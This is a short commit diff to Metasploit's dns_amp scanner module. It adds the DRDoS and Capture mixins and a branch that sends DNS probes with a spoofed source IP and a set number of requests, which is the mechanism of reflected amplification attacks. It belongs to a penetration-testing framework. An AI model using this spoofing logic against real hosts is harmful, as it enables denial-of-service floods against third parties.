Land rapid7#3839, @jabra-'s updates to dns_amp to support spoofing

jhart-r7 · jhart-r7 · commit fc4c1907d305 · 2014-09-22T12:14:39.000-07:00
diff --git a/modules/auxiliary/scanner/dns/dns_amp.rb b/modules/auxiliary/scanner/dns/dns_amp.rb
@@ -8,7 +8,9 @@
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Capture
   include Msf::Auxiliary::UDPScanner
+  include Msf::Auxiliary::DRDoS
 
   def initialize
     super(
@@ -89,7 +91,12 @@ def scanner_prescan(batch)
   end
 
   def scan_host(ip)
-    scanner_send(@msearch_probe, ip, datastore['RPORT'])
+    if spoofed?
+      datastore['ScannerRecvWindow'] = 0
+      scanner_spoof_send(@msearch_probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      scanner_send(@msearch_probe, ip, datastore['RPORT'])
+    end
   end
 
   def scanner_process(data, shost, sport)
